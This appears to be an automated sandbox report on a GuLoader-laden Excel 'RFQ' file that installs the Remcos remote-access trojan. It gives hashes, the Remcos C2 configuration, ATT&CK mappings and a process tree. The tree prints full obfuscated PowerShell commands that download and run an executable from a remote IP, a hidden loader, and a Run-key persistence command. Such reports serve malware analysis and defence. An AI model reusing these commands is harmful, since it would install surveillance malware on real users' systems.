guloader | 5f6994bb56a6b6962eea0bb1c80dbabdb29cddf2ff323551ad7f307a7fbe8936

Analysis

max time kernel
101s
max time network
106s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
25-09-2024 06:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RFQ-948563836483638563735435376354.xls
Size

706KB
MD5

4a41468b2a645e97f084f9b3b2d11d5d
SHA1

2a5548c0b61fc6a3e2f572c580731e02824d966c
SHA256

5f6994bb56a6b6962eea0bb1c80dbabdb29cddf2ff323551ad7f307a7fbe8936
SHA512

c6bb1c5be60acf8f0b28a76b7a3814dfd169b7f36501437f9e1c6151a18d4acaca6adaca1c537198c4fec1cbd4e0f1760b2eba840699d0054c20a3ae00931460
SSDEEP

12288:z+UOAsHFnd7HeT/o8gg8Rsfe8B+j6BeuMOTT3n7j8p3tdrBpG2uCBbuwiLz:zepsAbg8RINMq33EtnpZowiL

Score

10^/10

guloader remcos rem_doc2 defense_evasion discovery downloader execution persistence rat

Malware Config

Extracted

Family

remcos

Botnet

Rem_doc2

107.173.4.16:2404

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-DSGECX
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Blocklisted process makes network request 3 IoCs

flow	pid	Process
10	2704	mshta.exe
11	2704	mshta.exe
13	2632	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
424	powershell.exe

Downloads MZ/PE file

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
2632	powershell.exe
1940	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
1376	audiodg.exe

Loads dropped DLL 5 IoCs

pid	Process
2632	powershell.exe
424	powershell.exe
424	powershell.exe
424	powershell.exe
1136	salited.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Windows\CurrentVersion\Run\Startup key = "%Risalamands238% -windowstyle minimized $Handspring=(Get-ItemProperty -Path 'HKCU:\\armbroeste\\').Speedboat;%Risalamands238% ($Handspring)"	reg.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
1136	salited.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
424	powershell.exe
1136	salited.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 424 set thread context of 1136	424	powershell.exe	41

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Common Files\Noumenalize\solipsists.cru	audiodg.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Fonts\Urim.ini	audiodg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	audiodg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	salited.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1612	reg.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	salited.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	salited.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2888	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
2632	powershell.exe
2632	powershell.exe
2632	powershell.exe
424	powershell.exe
424	powershell.exe
424	powershell.exe
424	powershell.exe
424	powershell.exe
424	powershell.exe
424	powershell.exe
424	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
424	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2632	powershell.exe
Token: SeDebugPrivilege	424	powershell.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
2888	EXCEL.EXE
2888	EXCEL.EXE
2888	EXCEL.EXE
2888	EXCEL.EXE
2888	EXCEL.EXE

Suspicious use of WriteProcessMemory 38 IoCs

description	pid	Process	procid_target
PID 2704 wrote to memory of 1940	2704	mshta.exe	31
PID 2704 wrote to memory of 1940	2704	mshta.exe	31
PID 2704 wrote to memory of 1940	2704	mshta.exe	31
PID 2704 wrote to memory of 1940	2704	mshta.exe	31
PID 1940 wrote to memory of 2632	1940	cmd.exe	33
PID 1940 wrote to memory of 2632	1940	cmd.exe	33
PID 1940 wrote to memory of 2632	1940	cmd.exe	33
PID 1940 wrote to memory of 2632	1940	cmd.exe	33
PID 2632 wrote to memory of 2664	2632	powershell.exe	34
PID 2632 wrote to memory of 2664	2632	powershell.exe	34
PID 2632 wrote to memory of 2664	2632	powershell.exe	34
PID 2632 wrote to memory of 2664	2632	powershell.exe	34
PID 2664 wrote to memory of 3016	2664	csc.exe	35
PID 2664 wrote to memory of 3016	2664	csc.exe	35
PID 2664 wrote to memory of 3016	2664	csc.exe	35
PID 2664 wrote to memory of 3016	2664	csc.exe	35
PID 2632 wrote to memory of 1376	2632	powershell.exe	37
PID 2632 wrote to memory of 1376	2632	powershell.exe	37
PID 2632 wrote to memory of 1376	2632	powershell.exe	37
PID 2632 wrote to memory of 1376	2632	powershell.exe	37
PID 1376 wrote to memory of 424	1376	audiodg.exe	38
PID 1376 wrote to memory of 424	1376	audiodg.exe	38
PID 1376 wrote to memory of 424	1376	audiodg.exe	38
PID 1376 wrote to memory of 424	1376	audiodg.exe	38
PID 424 wrote to memory of 1136	424	powershell.exe	41
PID 424 wrote to memory of 1136	424	powershell.exe	41
PID 424 wrote to memory of 1136	424	powershell.exe	41
PID 424 wrote to memory of 1136	424	powershell.exe	41
PID 424 wrote to memory of 1136	424	powershell.exe	41
PID 424 wrote to memory of 1136	424	powershell.exe	41
PID 1136 wrote to memory of 1200	1136	salited.exe	42
PID 1136 wrote to memory of 1200	1136	salited.exe	42
PID 1136 wrote to memory of 1200	1136	salited.exe	42
PID 1136 wrote to memory of 1200	1136	salited.exe	42
PID 1200 wrote to memory of 1612	1200	cmd.exe	44
PID 1200 wrote to memory of 1612	1200	cmd.exe	44
PID 1200 wrote to memory of 1612	1200	cmd.exe	44
PID 1200 wrote to memory of 1612	1200	cmd.exe	44

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\RFQ-948563836483638563735435376354.xls
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2888

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2704
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/c poweRSHElL.ExE -eX bYpAsS -nOp -W 1 -c DEVICEcrEdeNTIAldEpLOYment ; Iex($(Iex('[SystEm.tEXT.EnCoDInG]'+[CHar]58+[CHaR]0X3A+'uTf8.GetSTrINg([sySTEM.cOnveRt]'+[chAR]0X3a+[CHAr]0x3a+'FRoMbASE64strinG('+[cHAR]34+'JE5VQiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1CZVJEZUZpbklUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1vbi5ETEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaWUJ0dGZ6RixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkVUhULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRKdmFETCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ1ZlVWJILEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERCTyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIm1RZW1lZ1dGRWl4IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1Fc1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKeGR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICROVUI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTcyLjMxLjE0LzM1MC9hdWRpb2RnLmV4ZSIsIiRlblY6QVBQREFUQVxhdWRpb2RnLmV4ZSIsMCwwKTtzdEFydC1TTEVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcYXVkaW9kZy5leGUi'+[cHar]34+'))')))"
  2⤵
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1940
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    poweRSHElL.ExE -eX bYpAsS -nOp -W 1 -c DEVICEcrEdeNTIAldEpLOYment ; Iex($(Iex('[SystEm.tEXT.EnCoDInG]'+[CHar]58+[CHaR]0X3A+'uTf8.GetSTrINg([sySTEM.cOnveRt]'+[chAR]0X3a+[CHAr]0x3a+'FRoMbASE64strinG('+[cHAR]34+'JE5VQiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1CZVJEZUZpbklUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1vbi5ETEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaWUJ0dGZ6RixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkVUhULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRKdmFETCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ1ZlVWJILEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERCTyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIm1RZW1lZ1dGRWl4IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1Fc1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKeGR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICROVUI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTcyLjMxLjE0LzM1MC9hdWRpb2RnLmV4ZSIsIiRlblY6QVBQREFUQVxhdWRpb2RnLmV4ZSIsMCwwKTtzdEFydC1TTEVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcYXVkaW9kZy5leGUi'+[cHar]34+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - Loads dropped DLL
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2632
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ytxtmzjt.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2664
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1131.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC1130.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3016
  - - C:\Users\Admin\AppData\Roaming\audiodg.exe
      "C:\Users\Admin\AppData\Roaming\audiodg.exe"
      4⤵
      Executes dropped EXE
      Drops file in Program Files directory
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1376
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" -windowstyle hidden "$Lysintensiteters=Get-Content 'C:\Users\Admin\AppData\Roaming\euthanasic\satineredes\Gammastraales\Maxiernes95\Rabarbergrden.Afm';$Chunderous=$Lysintensiteters.SubString(56880,3);.$Chunderous($Lysintensiteters)"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Loads dropped DLL
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:424
      - C:\Users\Admin\AppData\Local\Temp\salited.exe
        
        "C:\Users\Admin\AppData\Local\Temp\salited.exe"
        6⤵
        Loads dropped DLL
        Suspicious use of NtCreateThreadExHideFromDebugger
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Modifies system certificate store
        Suspicious use of WriteProcessMemory
        
        PID:1136
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Risalamands238% -windowstyle minimized $Handspring=(Get-ItemProperty -Path 'HKCU:\armbroeste\').Speedboat;%Risalamands238% ($Handspring)"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1200
        
        C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Risalamands238% -windowstyle minimized $Handspring=(Get-ItemProperty -Path 'HKCU:\armbroeste\').Speedboat;%Risalamands238% ($Handspring)"
        8⤵
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:1612

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
7fb5fa1534dcf77f2125b2403b30a0ee

SHA1
365d96812a69ac0a4611ea4b70a3f306576cc3ea

SHA256
33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f

SHA512
a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
a63237909df3c56349f66e9000ff7a2e

SHA1
7ee74954e0c668540725bbc5535d9d812ade0950

SHA256
033d257f0302c8b9a1cd3fdc81c63110007f89000f6ff80512cc9f8fb7b0bd02

SHA512
95754399066bd7bf81cc4fe6655f1c571d423c45372cb60d9aff2fedeec390c17096ee6d299289dd94b2ab6c457ef11b36f09ba0d844a503d504a93391389cff

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
41cb5c5f836a4d196a84a31992beed83

SHA1
e9b9a17c2cc863864e0360c4687136347a9ff844

SHA256
ae71a5e9e9e232fdda108615a54c0996d8eb616929ae73807935cbb48124b3d1

SHA512
595c85c9e7098fa5449110513068f341dbfaea2c7ef1c13dfd645c68c869306888a5aa8287dcaa62a35004eac2781b8557bff6f1766a8a88632acfadb3ce341e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
7f092dc3df3411e373e13919b0bd1489

SHA1
c516d91dd08bc5cc9e9b638c17aab4f3334f103d

SHA256
c51afa44f5b4d8694186e4e86f397b5761cc1e980a1448d2b02d6bdbd1caeb74

SHA512
ee1535831259ba71d5037a154b57ede314b190fcf8ea0863e53f1b97fc992d157201623856c9a15333bd061cd2f95299b235fd23348bcb9f5749bb2807a320d1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\56KJ964X\IEnetbookcookies[1].hta

Filesize
8KB

MD5
66ed213f5317d34d444d5b11f381950a

SHA1
52341d6b3fd8df51247f25b6dca88fdf1e523f57

SHA256
fbac869003ab5c97f586c2bf0b39d6869293e345d943e2b2499899b94994b212

SHA512
b5cfce2375e3244f68dde8bc8e6c4f1954b19f9b7ff9d56b63c85301ad8f3250ee0ea3d108e7a3749a5e903f0c511be2455ef0b1ab4ab483d2c8f60c3286e9db

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabFCB6.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES1131.tmp

Filesize
1KB

MD5
d3d203696d546a47498d0c9903580d16

SHA1
3d132b73598111cb8543634d72d3d0b17cbedf24

SHA256
c6e947a5ba0a08d71b0a6a4891380a1720dc35e847ff418b7aa04364262d6017

SHA512
11034c10f8beb4090447f80c65c8393bc6afa304316c55e6b9fa7e859186a65e45f6aebe0c88f8aab58d2aef540dea1ca6a46752c5d31b4457405bbba48afc87

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar70AE.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\ytxtmzjt.dll

Filesize
3KB

MD5
be28adaa59fb11d5f86bbbaa443e5237

SHA1
0dd790adf56a5f3ef6c848a6d646bae634645420

SHA256
773969b4cac1834df14229968a31685ea0d256a612d561e1d4b4b85b06782d06

SHA512
05b31b0ac0716b754bb73e416ff5309b3fc327323bda39fd3f4fe1d3a65f77eb1b71377d15a0e2dc964801f4094e8a08555dc47d8089ca084645eae9b0598dea

Download Submit
C:\Users\Admin\AppData\Local\Temp\ytxtmzjt.pdb

Filesize
7KB

MD5
d90735ace28e4af7d756f27b659d4899

SHA1
8c8458f80996c8cf150084164b639565af77a8b9

SHA256
bcfe6882f5fa2e60b7a13c9b5429c81f8b7b020e080d74a07a1417cd75cafbe1

SHA512
b1a7000c54fd3f41e67a08d03dcf016a23bad5af4db64d0b1b2694cf719eacbc66457a00781fab1a30deb6e7809daf6da267761bcedfa9df3d8670bce2ce0849

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
bb90aff83765b2ed18a2244c677d4256

SHA1
a57e29fc57aa0dee7c88063f8ae83a252785d5a1

SHA256
3ab677398b9f8569f8a68daecd414a6d0fb98dd51c2acc8f24202f564b523252

SHA512
a908056bfe3e258030015011d1752b72fdfae8bdbe6e454eb276c9c69dc529b7abbfe29f3c2160b0131a6b09339a0aaa7c23d70d957deb574811f3260688c406

Download Submit
C:\Users\Admin\AppData\Roaming\audiodg.exe

Filesize
658KB

MD5
c5aceb5a91bf991604daec67bde90bc7

SHA1
66f965774fbee77e43d089281366d1256b312386

SHA256
547ffc87de4f0a1aa0c3031152ba6297e1b0aa81e41fa1d5f97a63318137206d

SHA512
a774095ba9c245ecb217fabbcc3f5a37d9678ef1e304543834a54eb554fb0735b761957cd254c30b5ee0e73638c2992580fffe68b1aadb824e76a8b10c375a6e

Download Submit
C:\Users\Admin\AppData\Roaming\euthanasic\satineredes\Gammastraales\Kordon.int

Filesize
314KB

MD5
bdfb00f48094664301b955139669444b

SHA1
13dfa5fe6afabe51641e7080a73de52381544382

SHA256
958388d7d8f5b6d68e801d8d597a6627c8cf63daf87cc9baa35bd0e5d270cfad

SHA512
5490f651b643a7b3d0a2d501634dede26f481cde57123e3c6f942620adb3e72afbb266c262bb305545df58746832a1611946c8fcdd3a464c30d424658379960b

Download Submit
